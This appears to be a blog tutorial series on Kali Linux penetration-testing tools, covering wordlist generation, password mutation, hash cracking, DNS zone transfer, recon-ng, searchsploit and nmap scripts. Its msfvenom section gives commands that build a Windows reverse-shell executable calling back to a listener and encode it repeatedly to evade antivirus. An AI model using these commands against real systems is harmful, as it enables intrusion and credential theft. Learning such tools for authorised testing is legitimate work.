12 Days of Christmas

Day 1: CeWL

The first tool to be introduced is CeWL (Custom Word List Generator). CeWL crawls through a target website and return all the unique words found within the site.

CeWL can be run directly from the terminal in Kali Linux by issuing the command:

cewl <target-site>

By default, this command will crawl through the target site, stopping at a maximum depth of 2. Also, it will (by default) return words that are at least of length 3.

To view all the options available in cewl, issue the command:

cewl –help

Some of the other useful options are:
-w / –write: Output to a word
-d / –depth <int>: Set the depth for CeWL to crawl
-m / –min_word_length: The minimum word length
-e / –email_file <filename>: Output email addresses to a file

Back to Top

Day 2: Password Mutation using John the Ripper

Previously, using CeWL, we have generated a wordlist by crawling a website. However, this wordlist may not be very useful in bruteforcing password as users normally append a few digits behind their password. E.g. “password” may be mutated by the user to “password01”.

John the Ripper, can help to generate a new word list by including such mutation. To do that, new rules need to be created in the configuration file. By default, the location of the configuration file is /etc/john.conf. To add a new rule, simply append the rules to the configuration file.

To define a rule set that append a digit to the words in the word, append the following to the configuration file:

[List.Rules:AppendDigit]
 $[0-9]

To define a rule set that append 2 digits to the words in the word, append the following to the configuration file:

[List.Rules:AppendDigits]
 $[0-9]$[0-9]

To define a rule set that appends a pre-defined set of symbols to the words in the word, append the following to the configuration file:

[List.Rules:AppendSymbol]
 $[@#$%&*]

To prepend instead of append, simply replace ‘$’ with ‘^’.

Lastly, to generate the new wordlist with password mutation, simply use the following command in the terminal.

john --wordlist=[path to the wordlist] --stdout --rules:[rule set name] > [genenerated wordlist file path]

E.g.:

john --wordlist=wordlist --stdout --rule:AppendDigits > newWordList

Looking at the new word list, you will notice 2 extra digits have been appended to each word. This also increases the size of the word list.

New Word List

Referencehttp://help.metasploit.com/index.html#24-bruteforce/bruteforce.html

Back to Top

Day 3: Hash Identification

It is useful to identify the type of hash algorithm for a certain digest. It can help in password cracking by reducing the search space. In Kali, hash-identification can help to predict the hash algorithm used to derive a certain digest.

hahsid

The usage is simple. The user will just need to input the digest, and the hash-identifier will attempt to guess the hash algorithm used. It will then provide a list of possible hash algorithm and least possible hash algorithm.

Demo

Original text: edgis
CRC32: 131f42b9
MD5: e362e35b7efc8910054871b0a8edb007
SHA-1: b58cba8c669711d9bb979eae8eaa8c7e255e58b5
SHA-256: c826002aac59efc150b847125b08adb790f3182408a241f99529144b48671bdf
Tiger: d9c78330bce66fe05c0540f79cb6c6ac435c1e7bbb4351e0

Tool Used to Generate the Digestshttp://www.fileformat.info/tool/hash.htm

CRC32

md5

SHA-1

SHA-256

Tiger

Back to Top

Day 4: Using Online Hash Databases

After identifying the type of hash algorithm, we can now try and crack the digest. One useful tool found in Kali Linux is findmyhash. findmyhash look up several online databases for a specific digest. Once it find a match, it will stop and return the corresponding text that can be used to derive the digest.

findmyhash <hash algorithm> -h <hash>

Demo

Original text: password
MD5: 5f4dcc3b5aa765d61d8327deb882cf99
SHA-1: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

MD5

SHA-1

Do note that this process may take some time and may not yield any result (if the digest cannot be found in any of the online databases used by findmyhash).

Back to Top

Day 5: Zone Transfer Tool

Misconfigured DNS can often lead to exposure of data. One such example is the use of DNS zone transfer to discover information about an organisation. Dig and Host can be used to conduct zone transfer. In Kali Linux, zone transfer is made even easier with dnsenum.

dnsenum <URL of Site>

There are many options available in dnsenum. Some of the useful one are:

-t / –timeout: TCP and UDP timeout in seconds
–thread <values>: Set the number of threads to perform different queries

To view more options, use -h / –help

Back to Top

Day 6: recong-ng

recong-ng is a powerful full-featured web reconnaissance framework. The usage is very similar to the Metasploit Framework (MSF).

recon-ng

help

show modules

whois_pocs to find a list of contact details from example.com

run

There you go. Contact details of the domain name holder.

There are a lot of modules to explore. Some of the more interesting one:

recon/companies-contacts/facebook
recon/creds-creds/leakdb
recon/domain-creds/pwnedlist/leaks_dump
recon/hosts-hosts/ip_neighbor
recon/locations-locations/reverse_geocode

Have fun “recon-ing”. 😀

Back to Top

Day 7: urlcrazy

urlcrazy is a tool in Kali Linux that generates and test domain name typos and variations to detect typo squatting, URL hijacking, phishing and corporate espionage.

urlcrazy www.example.com

urlcrazy Options

Back to Top

Day 8: searchsploit

searchsploit makes searching for exploits found inside Kali Linux very easy.

By specifying a keyword, searchsploit returns matching results and the file path to the exploit.

searchsploit vsftp

searchsploit heartbleed

Back to Top

Day 9: msfvenom

msfvenom is the successor of msfpayload and msfencode. Both msfpayload and msfencode are slated for retirement in the near future (June 2015). msfvenom consolidates the features of its predecessor and standardise its usage.

msfvenom is able to (1) generate various types of shellcode (features of msfpayload) and (2) encode shellcodes into format that can be easily deployed onto targets (features of msfencode).

msfvenom Help Menu

List of all available payloads

List of all available encoders

To show available output formats:

msfvenom –help-formats

Executable Formats: asp, aspx, aspx-exe, dll, elf, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war

Transform Formats: bash, c, csharp, dw, dword, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

Demo: Generate Payload (windows/shell/reverse_tcp)

Payload Options

In this payload, we will need to define both LHOST and LPORT. In this demo, I will set it as 192.168.1.100 and 5555 respectively, and output the payload in Python format.

Payload in Python Format

Many times, there may be some bad characters in the payload that will cause the exploit to fail. One such example is \x00, the null bytes. To remove them, we can use the -b options.

Python Payload without Null Bytes

We can also output the payload in executable format:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b “\x00” -f exe > shell-exe

Note: In this case, 1 round of shikata_ga_nai encoding is applied automatically. shikata_ga_nai is a polymorphic XOR additive feedback encoder. We can do extra encoding to evade antivirus detection. To encode the payload with shitaka_ga_nai 10 times:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b “\x00” -e “x86/shitaka_ga_nai” -i 10 -f exe > shell-exe

Payload Encoded with shitaka_ga_nai 10 Times

 

Notice both payloads yield almost the same detection rate? This is because most antivirus vendors know the templates used by Metasploit.

References:

  1. Good-byte msfpayload and msfencode
  2. MSFvenom

Back to Top

Day 10: nmap Scripting Engine (NSE)

nmap Scripting Engine (NSE) features many scripts that can be used in a network penetration test. It allow users to write and automate networking tasks. It is written with the following features in mind (http://nmap.org/book/nse.html#nse-intro):

  • Network Discovery
  • More Sophisticated Version Detection
  • Vulnerability Detection
  • Backdoor Detection
  • Vulnerability Exploitation

A list of available scripts can be found in the nmap documentation (http://nmap.org/nsedoc/).

HTTP-UserAgent-Tester (http://nmap.org/nsedoc/scripts/http-useragent-tester.html)

DHCP-Discover (http://nmap.org/nsedoc/scripts/dhcp-discover.html)

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s